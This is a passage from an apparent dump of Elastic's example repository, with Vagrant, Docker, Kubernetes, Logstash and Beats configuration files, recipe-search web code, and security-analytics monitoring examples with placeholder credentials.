 1 | # -*- mode: ruby -*-
 2 | # vi: set ft=ruby :
 3 | 
 4 | Vagrant.configure("2") do |config|
 5 |   config.vm.box = "ubuntu/bionic64"
 6 |   config.vm.provision "shell", path: "provisioner.sh", env: {
 7 |     "CLOUD_ID" => "#{ENV['CLOUD_ID']}",
 8 |     "CLOUD_AUTH" => "#{ENV['CLOUD_AUTH']}"
 9 |   }
10 | 
11 |   config.vm.provider "virtualbox" do |v|
12 |     v.memory = 2096
13 |     v.cpus = 2
14 |   end
15 | 
16 |   config.vm.provision :hosts, :sync_hosts => true, :add_localhost_hostnames => false
17 | 
18 |   (0..2).each do |node_index|
19 |     config.vm.define "kafka#{node_index}" do |node|
20 |       node.vm.network :private_network, :ip => "10.200.200.#{node_index + 10}"
21 |       node.vm.hostname = "kafka#{node_index}"
22 |     end
23 |   end
24 | end
25 | 
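
A usage sketch: the shell provisioner reads CLOUD_ID and CLOUD_AUTH from the host environment, and the :hosts provisioner needs the vagrant-hosts plugin:

    vagrant plugin install vagrant-hosts          # required by the :hosts provisioner
    export CLOUD_ID='<cloud id from cloud.elastic.co>'
    export CLOUD_AUTH='<user:password>'
    vagrant up                                    # brings up kafka0, kafka1 and kafka2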


--------------------------------------------------------------------------------
/Miscellaneous/kafka_monitoring_with_beats_modules/run-kafka.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | KAFKA_VERSION=2.1.1
 4 | SCALA_VERSION=2.12
 5 | KAFKA_TAR_FILENAME=kafka_${SCALA_VERSION}-${KAFKA_VERSION}
 6 | 
 7 | cd /opt/${KAFKA_TAR_FILENAME}
 8 | 
 9 | bin/kafka-server-stop.sh
10 | nohup bin/kafka-server-start.sh config/server.properties > /dev/null &
11 | 
12 | if [ "$(hostname)" == "kafka0" ]; then
13 |   sleep 10
14 |   bin/kafka-topics.sh --create --zookeeper localhost:2181 --replication-factor 2 --partitions 3 --topic beats
15 | 
16 |   filebeat setup -e
17 |   metricbeat setup -e
18 | fi
19 | 
20 | service filebeat start
21 | service metricbeat start
22 | 


--------------------------------------------------------------------------------
/Miscellaneous/kibana_geoserver/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM kartoza/geoserver
2 | MAINTAINER Elastic Infra <infra@elastic.co>
3 | 
4 | ENV GEOSERVER_DATA_DIR /opt/geoserver/data_dir
5 | 
6 | RUN mkdir -p $GEOSERVER_DATA_DIR/shapefiles
7 | 
8 | COPY *.shp $GEOSERVER_DATA_DIR/shapefiles/
9 | 


--------------------------------------------------------------------------------
/MonitoringEKS/config/metricbeat-iam-policy.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "Version": "2012-10-17",
 3 |     "Statement": [
 4 |         {
 5 |             "Sid": "VisualEditor0",
 6 |             "Effect": "Allow",
 7 |             "Action": [
 8 |                 "ec2:DescribeRegions",
 9 |                 "cloudwatch:GetMetricData",
10 |                 "cloudwatch:ListMetrics",
11 |                 "tag:GetResources",
12 |                 "sts:GetCallerIdentity",
13 |                 "iam:ListAccountAliases",
14 |                 "ec2:DescribeInstances",
15 |                 "rds:DescribeDBInstances",
16 |                 "sqs:ListQueues"
17 |             ],
18 |             "Resource": "*"
19 |         }
20 |     ]
21 | }


--------------------------------------------------------------------------------
/MonitoringEKS/images/k8s-overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/k8s-overview.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/k8s.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/k8s.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/logs-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/logs-app.png


--------------------------------------------------------------------------------
/MonitoringEKS/images/metrics-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringEKS/images/metrics-app.png


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/AWS_ACCESS_KEY_ID:
--------------------------------------------------------------------------------
1 | <text>


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/AWS_ACCESS_KEY_SECRET:
--------------------------------------------------------------------------------
1 | <text>


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/ELASTIC_CLOUD_AUTH:
--------------------------------------------------------------------------------
1 | user:password
2 | 


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/CREDS/ELASTIC_CLOUD_ID:
--------------------------------------------------------------------------------
1 | text


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/generate-secrets-manifest.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # remove any existing secrets manifest
 4 | rm -f secrets.yaml
 5 | 
 6 | echo "
 7 | apiVersion: v1
 8 | kind: Secret
 9 | metadata:
10 |   name: metricbeat-secrets
11 |   namespace: kube-system
12 | data:" >> secrets.yaml
13 | 
14 | for file in CREDS/*; do 
15 |     if [ -f "$file" ]; then 
16 |       if [[ $file != *".secret" ]]; then
17 |         name=${file#CREDS/}
18 |         echo "  $name: \"$(base64 < "$file" | tr -d '\n')\"" >> secrets.yaml
19 |       fi
20 |     fi 
21 | done
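
A usage sketch (the kubectl step is an assumption about how the generated manifest is meant to be applied; the Secret lands in the kube-system namespace, and files ending in .secret are skipped):

    ./generate-secrets-manifest.sh
    kubectl apply -f secrets.yaml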


--------------------------------------------------------------------------------
/MonitoringEKS/secrets/secrets-example.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Secret
 3 | metadata:
 4 |   name: beats-secrets
 5 | data:
 6 |   ELASTIC_CLOUD_ID: "b64string"
 7 |   ELASTIC_CLOUD_AUTH: "b64string"
 8 |   AWS_ACCESS_KEY_ID: "b64string"
 9 |   AWS_ACCESS_KEY_SECRET: "b64string"
10 | 
11 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/CLOUD_ID:
--------------------------------------------------------------------------------
1 | Put the cloud ID from cloud.elastic.co here. Make sure there is only one line in the file, containing only the cloud ID and no whitespace (replace this line).
2 | 
3 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/DockerDashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringKubernetes/DockerDashboard.png


--------------------------------------------------------------------------------
/MonitoringKubernetes/ELASTIC_PASSWORD:
--------------------------------------------------------------------------------
1 | Put the password for the elastic user here. Make sure there is only one line in the file, containing only the password and no whitespace (replace this line).
2 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/download.txt:
--------------------------------------------------------------------------------
1 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/CLOUD_ID
2 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/ELASTIC_PASSWORD
3 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/elasticsearch.yaml
4 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/filebeat-kubernetes.yaml
5 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/guestbook.yaml
6 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/metricbeat-kubernetes.yaml
7 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/packetbeat-kubernetes.yaml
8 | wget https://raw.githubusercontent.com/elastic/examples/master/MonitoringKubernetes/watch.txt
9 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/elasticsearch.yaml:
--------------------------------------------------------------------------------
 1 | xpack.notification.slack:
 2 |   account:
 3 |     monitoring:
 4 |       url: https://hooks.slack.com/services/T7SBS7MU6/xxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx
 5 |       message_defaults:
 6 |         from: Elastic
 7 |         icon: https://pbs.twimg.com/media/CQt3cWzWIAA7o2y.png
 8 |         attachment:
 9 |           fallback: "Threshold Notification"
10 |           color: "#36a64f"
11 |           title: "Threshold Notification"
12 |           text: "One of your watches generated this notification."
13 |           mrkdwn_in: "pretext, text"
14 | 


--------------------------------------------------------------------------------
/MonitoringKubernetes/scaling-discover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/MonitoringKubernetes/scaling-discover.png


--------------------------------------------------------------------------------
/MonitoringKubernetes/watch.txt:
--------------------------------------------------------------------------------
 1 | Index: packetbeat-*
 2 | 
 3 | When max() of Responsetime
 4 | Over all docs
 5 | Is above 900
 6 | During the last 1 minute
 7 | 
 8 | Slack
 9 | 
10 | The maximum {{ctx.metadata.name}} was {{ctx.payload.result}}ms over the last minute.  This exceeded the threshold.
11 | 
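
The recipe above maps onto the Watcher API roughly as follows. A hedged sketch of an equivalent watch (watch id, Slack channel, and credentials are placeholders; the slack account name matches the monitoring account configured in elasticsearch.yaml above):

    curl -u elastic:changeme -H 'Content-Type: application/json' \
      -X PUT 'localhost:9200/_xpack/watcher/watch/max_responsetime' -d '{
      "trigger": { "schedule": { "interval": "1m" } },
      "input": {
        "search": {
          "request": {
            "indices": ["packetbeat-*"],
            "body": {
              "size": 0,
              "query": { "range": { "@timestamp": { "gte": "now-1m" } } },
              "aggs": { "max_responsetime": { "max": { "field": "responsetime" } } }
            }
          }
        }
      },
      "condition": {
        "compare": { "ctx.payload.aggregations.max_responsetime.value": { "gt": 900 } }
      },
      "actions": {
        "notify_slack": {
          "slack": {
            "account": "monitoring",
            "message": {
              "to": ["#alerts"],
              "text": "The maximum responsetime was {{ctx.payload.aggregations.max_responsetime.value}}ms over the last minute. This exceeded the threshold."
            }
          }
        }
      }
    }'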


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/css/recipes.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/css/recipes.css


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.eot


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.ttf


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff2


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/js/bootstrap-table-zh-CN.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.11.0 - 2016-07-02
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";a.fn.bootstrapTable.locales["zh-CN"]={formatLoadingMessage:function(){return"正在努力地加载数据中,请稍候……"},formatRecordsPerPage:function(a){return"每页显示 "+a+" 条记录"},formatShowingRows:function(a,b,c){return"显示第 "+a+" 到第 "+b+" 条记录,总共 "+c+" 条记录"},formatSearch:function(){return"搜索"},formatNoMatches:function(){return"没有找到匹配的记录"},formatPaginationSwitch:function(){return"隐藏/显示分页"},formatRefresh:function(){return"刷新"},formatToggle:function(){return"切换"},formatColumns:function(){return"列"},formatExport:function(){return"导出数据"},formatClearFilters:function(){return"清空过滤"}},a.extend(a.fn.bootstrapTable.defaults,a.fn.bootstrapTable.locales["zh-CN"])}(jQuery);


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/js/npm.js:
--------------------------------------------------------------------------------
 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment.
 2 | require('../../js/transition.js')
 3 | require('../../js/alert.js')
 4 | require('../../js/button.js')
 5 | require('../../js/carousel.js')
 6 | require('../../js/collapse.js')
 7 | require('../../js/dropdown.js')
 8 | require('../../js/modal.js')
 9 | require('../../js/tooltip.js')
10 | require('../../js/popover.js')
11 | require('../../js/scrollspy.js')
12 | require('../../js/tab.js')
13 | require('../../js/affix.js')


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/IndexRecipesApp.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/IndexRecipesApp.class


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesApp.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesApp.class


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesServlet.class


--------------------------------------------------------------------------------
/Search/recipe_search_php/.gitignore:
--------------------------------------------------------------------------------
1 | vendor/
2 | composer.lock
3 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/composer.json:
--------------------------------------------------------------------------------
1 | {
2 |     "require": {
3 |         "elasticsearch/elasticsearch": "~5.0"
4 |     },
5 |     "autoload": {
6 |         "psr-4": { "RecipeSearch\\": "src/RecipeSearch/" }
7 |     }
8 | }
9 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/index.php:
--------------------------------------------------------------------------------
1 | simple.php


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/js/script.js:
--------------------------------------------------------------------------------
 1 | var addBlankItemToList = function(e) {
 2 |   var linkEl = e.target;
 3 |   var newEl = $(linkEl.previousElementSibling).clone();
 4 |   newEl.children(0).children(0).children(0).val("");
 5 |   newEl.insertBefore(linkEl);
 6 | }
 7 | 
 8 | $( "#add-ingredient" ).on("click", addBlankItemToList);
 9 | $( "#add-step" ).on("click", addBlankItemToList);
10 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/results.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (count($results) > 0) {
 3 | ?>
 4 | <table class="table table-striped">
 5 | <thead>
 6 |   <th>Title</th>
 7 |   <th>Description</th>
 8 |   <th>Preparation time (minutes)</th>
 9 |   <th>Cooking time (minutes)</th>
10 | </thead>
11 | <?php
12 |     error_reporting(E_ALL ^ E_NOTICE);
13 | 
14 |     foreach ($results as $result) {
15 |         $recipe = $result['_source'];
16 | ?>
17 | <tr>
18 |   <td><a href="/view.php?id=<?php echo $result['_id']; ?>"><?php echo $recipe['title']; ?></a></td>
19 |   <td><?php echo $recipe['description']; ?></td>
20 |   <td><?php echo $recipe['prep_time_min']; ?></td>
21 |   <td><?php echo $recipe['cook_time_min']; ?></td>
22 | </tr>
23 | <?php
24 |     } // END foreach loop over results
25 | ?>
26 | </table>
27 | <?php
28 | } // END if there are search results
29 | 
30 | else {
31 | ?>
32 | <p>Sorry, no recipes found :( Would you like to <a href="/add.php">add</a> one?</p>
33 | <?php
34 | 
35 | } // END else there are no search results
36 | 
37 | ?>
38 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/src/RecipeSearch/Constants.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | namespace RecipeSearch;
4 | 
5 | class Constants {
6 |     const ES_INDEX = 'food';
7 |     const ES_TYPE = 'recipe';
8 | }
9 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/src/RecipeSearch/Util.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | namespace RecipeSearch;
 4 | 
 5 | class Util {
 6 |     public static function recipeTitleToId($recipeTitle)
 7 |     {
 8 |         return preg_replace('/[^\w]+/', '-', strtolower($recipeTitle));
 9 |     }
10 | 
11 |     public static function recipeTagsToArray($recipeTags)
12 |     {
13 |         $tags = [];
14 |         foreach (explode(",", $recipeTags) as $tag) {
15 |           $tags[] = trim($tag);
16 |         }
17 |         return $tags;
18 |     }
19 | }
20 | 


--------------------------------------------------------------------------------
/Security Analytics/ACSC2020-008_IOCs/images/siem-rules.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/ACSC2020-008_IOCs/images/siem-rules.png


--------------------------------------------------------------------------------
/Security Analytics/SIEM-at-Home/beats-configs/filebeat/filebeat-syslog-input.yml:
--------------------------------------------------------------------------------
 1 | ###################### SIEM at Home - Filebeat Syslog Input Configuration Example #########################
 2 | # This file is an example configuration file highlighting only the most common
 3 | # options. The filebeat.reference.yml file from the same directory contains all the
 4 | # supported options with more comments. You can use it as a reference.
 5 | #
 6 | # You can find the full configuration reference here:
 7 | # https://www.elastic.co/guide/en/beats/filebeat/index.html
 8 | #=========================== Filebeat inputs =============================
 9 | filebeat.inputs:
10 | # Configure Filebeat to receive syslog traffic
11 | - type: syslog
12 |   enabled: true
13 |   protocol.udp:
14 |     host: "10.101.101.10:5140" # IP:Port of host receiving syslog traffic
15 | 
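
To smoke-test the input, a syslog message can be sent to the configured address with util-linux logger (the host and port must match the config above):

    # -d sends over UDP; -n/-P select the remote host and port
    logger -d -n 10.101.101.10 -P 5140 'SIEM at home: test syslog event'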


--------------------------------------------------------------------------------
/Security Analytics/SIEM-examples/README.md:
--------------------------------------------------------------------------------
1 | # SIEM examples
2 | 
3 | SIEM examples, such as scripts and APIs:
4 | 
5 | [**Detections API Postman collection**](Detections-API/Kibana.postman_collection.v2.json)
6 | 
7 | [**Ingest pipeline for Packetbeat adding ASN details**](Packetbeat/geoip-info.json) (an alternative to the pipeline in the [docs](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-geoip.html#packetbeat-configuring-geoip))
8 | 


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/example_2/auditd.cef.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/auditd_analysis/example_2/auditd.cef.tar.gz


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/example_2/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-unusual_process",
 3 |   "job_id": "unusual_process",
 4 |   "query": {
 5 |     "term": {
 6 |       "deviceEventCategory": {
 7 |         "value": "EXECVE"
 8 |       }
 9 |     }
10 |   },
11 |   "query_delay": "60s",
12 |   "frequency": "300s",
13 |   "scroll_size": 1000,
14 |   "indexes": [
15 |     "cef-auditd-*"
16 |   ],
17 |   "types": [
18 |     "doc"
19 |   ]
20 | }
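
A sketch of loading this datafeed over the ML API (the unusual_process job must already exist; credentials are placeholders, and some stack versions reject ids repeated in the request body, in which case strip datafeed_id and job_id from the file first):

    curl -u elastic:changeme -H 'Content-Type: application/json' \
      -X PUT 'localhost:9200/_xpack/ml/datafeeds/datafeed-unusual_process' \
      -d @data_feed.json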


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | urllib3==1.21.1
3 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/broker-list.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | CONTAINERS=$(docker ps | grep 9092 | awk '{print $1}')
4 | BROKERS=$(for CONTAINER in $CONTAINERS; do docker port $CONTAINER 9092 | sed -e "s/0.0.0.0:/$HOST_IP:/g"; done)
5 | echo $BROKERS | sed -e 's/ /,/g'
6 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/download-kafka.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | mirror=$(curl --stderr /dev/null https://www.apache.org/dyn/closer.cgi\?as_json\=1 | jq -r '.preferred')
4 | url="${mirror}kafka/${KAFKA_VERSION}/kafka_${SCALA_VERSION}-${KAFKA_VERSION}.tgz"
5 | wget -q "${url}" -O "/tmp/kafka_${SCALA_VERSION}-${KAFKA_VERSION}.tgz"
6 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/start-kafka-shell.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e HOST_IP=$1 -e ZK=$2 -i -t wurstmeister/kafka /bin/bash
3 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.6.0
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | RUN rm -f /usr/share/logstash/config/logstash.yml
4 | ADD config/logstash.yml /usr/share/logstash/config/logstash.yml
5 | CMD /usr/share/logstash/bin/logstash --modules arcsight --setup


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
 1 | modules:
 2 |   - name: arcsight
 3 |     var.input.eventbroker.bootstrap_servers: "kafka:9092"
 4 |     var.input.eventbroker.topics: "eb-cef"
 5 |     var.elasticsearch.hosts: "elasticsearch:9200"
 6 |     var.elasticsearch.username: "elastic"
 7 |     var.elasticsearch.password: "changeme"
 8 |     var.kibana.host: "kibana:5601"
 9 |     var.kibana.username: "elastic"
10 |     var.kibana.password: "changeme"
11 | 
12 | xpack.monitoring.elasticsearch.url: "http://elasticsearch:9200"
13 | 
14 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   kibana:
 4 |     image: docker.elastic.co/kibana/kibana:5.6.0
 5 |     links:
 6 |       - elasticsearch
 7 |     ports:
 8 |       - 5601:5601
 9 | 
10 |   elasticsearch:
11 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.6.0
12 |     cap_add:
13 |       - IPC_LOCK
14 |     volumes:
15 |       - esdata1:/usr/share/elasticsearch/data
16 |     ports:
17 |       - 9200:9200
18 |       
19 |   logstash:
20 |     build: logstash
21 |     links:
22 |       - elasticsearch
23 |       - kibana
24 |     ports:
25 |       - 5000:5000
26 |       - 9600:9600
27 | 
28 | volumes:
29 |   esdata1:
30 |     driver: local
31 |         
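
A usage sketch: build and start the stack, then point the ArcSight SmartConnector at port 5000 on the Docker host, where the logstash arcsight module listens per the config below:

    docker-compose up --build -d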


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.6.0
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | RUN rm -f /usr/share/logstash/config/logstash.yml
4 | ADD config/logstash.yml /usr/share/logstash/config/logstash.yml
5 | CMD /usr/share/logstash/bin/logstash --modules arcsight --setup


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
 1 | modules:
 2 |   - name: arcsight
 3 |     var.inputs: "smartconnector"
 4 |     var.input.smartconnector.port: "5000"
 5 |     var.elasticsearch.hosts: "elasticsearch:9200"
 6 |     var.elasticsearch.username: "elastic"
 7 |     var.elasticsearch.password: "changeme"
 8 |     var.kibana.host: "kibana:5601"
 9 |     var.kibana.username: "elastic"
10 |     var.kibana.password: "changeme"
11 | 
12 | 
13 | 
14 | xpack.monitoring.elasticsearch.url: "http://elasticsearch:9200"
15 | 
16 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/.gitignore:
--------------------------------------------------------------------------------
1 | *.tgz
2 | *.zip
3 | dns-tunnel-iodine-timeshifted.pcap
4 | 
5 | elasticsearch/
6 | packetbeat/
7 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/dns-tunnel-iodine.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/dns_tunnel_detection/dns-tunnel-iodine.pcap


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/dns_transform.painless:
--------------------------------------------------------------------------------
 1 | def alerts = ctx.payload.aggregations.by_domain.buckets.stream().collect(Collectors.toMap(p->p.key,item->[
 2 |         "total_requests" : item.doc_count,
 3 |         "unique_hostnames" : item.unique_hostnames.value,
 4 |         "total_bytes_in" : item.total_bytes_in.value,
 5 |         "total_bytes_out" : item.total_bytes_out.value,
 6 |         "total_bytes" : item.total_bytes_in.value + item.total_bytes_out.value
 7 | ]));
 8 | 
 9 | return ["alerts":alerts];
10 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | # /etc/packetbeat/packetbeat.yml
 2 | packetbeat.interfaces.device: en0
 3 | 
 4 | packetbeat.protocols.dns:
 5 |   ports: [53]
 6 |   include_authorities: true
 7 |   include_additionals: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 | 


--------------------------------------------------------------------------------
/Security Analytics/malware_analysis/images/kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/malware_analysis/images/kibana.png


--------------------------------------------------------------------------------
/Security Analytics/ssh_analysis/run_watch.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | if [ -z "$1" ] ; then
 3 |     echo "No watch name supplied e.g. ./run_watch.sh successful_login_external"
 4 |     exit 1
 5 | fi
 6 | 
 7 | username=elastic
 8 | if [ "$2" ] ; then
 9 |   username=$2
10 | fi
11 | 
12 | password=changeme
13 | if [ "$3" ] ; then
14 |   password=$3
15 | fi
16 | 
17 | echo "Running $1 watch"
18 | 
19 | curl -s -o /dev/null -X DELETE localhost:9200/_xpack/watcher/watch/$1 -u $username:$password
20 | es_response=$(curl -H "Content-Type: application/json" -w "%{http_code}" -s -o /dev/null -X POST localhost:9200/_xpack/watcher/watch/_execute -u $username:$password -d @$1.json)
21 | if [ 0 -eq $? ] && [ "$es_response" = "200" ]; then
22 |   echo "Running $1 watch...OK"
23 |   exit 0
24 | else
25 |   echo "Running $1 watch...FAILED"
26 |   exit 1
27 | fi


--------------------------------------------------------------------------------
/Speed Layer/README.md:
--------------------------------------------------------------------------------
 1 | # Speed Layers with Elastic
 2 | These are some resources to explore Elastic as a Speed Layer (a fast, scalable search and analytics layer on top of existing legacy data systems).
 3 | 
 4 | `logstash_batch_export.conf`
 5 | An example of batch loading of records from MySQL to Elasticsearch
 6 | 
 7 | `dev_console.json`
 8 | A lab for Kibana's Dev Console
 9 | 
10 | `kibana_objects.ndjson`
11 | Importable Kibana objects (dashboard, visualizations, index pattern)
12 | 
13 | Everything was built with Elastic Stack 7.3.
14 | 


--------------------------------------------------------------------------------
/Speed Layer/logstash_batch_export.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   jdbc {
 3 |     jdbc_driver_library => "mysql-connector-java-5.1.48-bin.jar"
 4 |     jdbc_driver_class => "com.mysql.jdbc.Driver"
 5 |     jdbc_connection_string => "${MYSQL_URI}"
 6 |     jdbc_user => "${MYSQL_USER}"
 7 |     jdbc_password => "${MYSQL_PASS}"
 8 |     statement => "SELECT * FROM transactions_flat"
 9 |   }
10 | }
11 | 
12 | output {
13 |   elasticsearch {
14 |     hosts => ["${ES_URL}"]
15 |     index => "transactions_dirty"
16 |     user => "speedlayer"
17 |     password => "${ES_PASS}"
18 |   }
19 | }
20 | 
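
A usage sketch: the config resolves its connection settings from the environment, so export them before running Logstash (the values below are placeholders; the MySQL driver jar must sit where jdbc_driver_library points):

    export MYSQL_URI='jdbc:mysql://localhost:3306/mydb'
    export MYSQL_USER='root' MYSQL_PASS='changeme'
    export ES_URL='http://localhost:9200' ES_PASS='changeme'
    logstash -f logstash_batch_export.conf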


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/DockerDashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/DockerDashboard.png


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_HOSTS:
--------------------------------------------------------------------------------
1 | ["http://elasticsearch-master.default.svc.cluster.local:9200"]
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_PASSWORD:
--------------------------------------------------------------------------------
1 | changeme
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_USERNAME:
--------------------------------------------------------------------------------
1 | elastic
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTIC_CLOUD_AUTH:
